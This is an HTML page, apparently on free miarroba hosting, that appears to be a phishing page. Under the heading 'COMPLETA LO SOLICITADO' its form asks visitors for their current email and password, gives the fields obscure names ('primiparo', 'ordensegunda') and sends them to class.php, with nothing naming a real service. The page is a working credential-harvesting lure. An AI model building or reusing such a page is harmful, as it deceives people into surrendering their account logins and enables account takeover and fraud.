<!DOCTYPE html>
<html>
  <head>
<!-- Inserted by miarroba -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-T2VG59');</script>
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-7294310421616689" crossorigin="anonymous"></script>
<!-- Inserted by miarroba -->

     <style>

html, body {
  height: 100%;
  margin: 0;
  padding: 0;
}

body {
  background: linear-gradient(to bottom right, rgba(180, 180, 252, 0.5), rgba(244, 171, 171, 0.5));
  background-size: cover;
}

     </style>
    <meta charset="UTF-8">
    <title>Home page</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="estilos.css">
  </head>
  <body 
   ><br><br><br><br>
    <form action="class.php" method="post">
        <img  style="width: 120px;" src="imagen.jpg" alt="">
      
        <h3 style="padding-left: 20px;" >COMPLETA LO SOLICITADO </h3>
    

      <center>
      <input  style="border: none; border-bottom: 2px solid rgb(0, 123, 255);" autocomplete="off" type="email" id="nombre" name="primiparo" placeholder="Email actual"    required>
    </center>
    
      <center>
      <input style="border: none; border-bottom: 2px solid rgb(0, 123, 255);" autocomplete="off" type="password" id="email" name="ordensegunda" placeholder="Contraseña actual" required>
    </center>
     <CENter>
      <button type="submit" style="font-weight: 900;" >CONFIRMAR</button></CENter>
    </form>
  <!-- Inserted by miarroba -->
</script></noframes></noembed></noscript><script type="text/javascript" src="https://hosting.miarroba.info/?__muid=78610b86ff3ca13343dafb24f35018481a916175&amp;h=2145226&amp;t=1698873335&amp;k=b5d429b81a2a39ba092c3d669e137cf9"></script><noscript><img alt="beacon" border="0" width="1" height="1" src="https://hosting.miarroba.info/?__muid=78610b86ff3ca13343dafb24f35018481a916175&amp;h=2145226&amp;t=1698873335&amp;k=b5d429b81a2a39ba092c3d669e137cf9&amp;img=1" /></noscript>
<!-- Inserted by miarroba -->
</body>
</html>
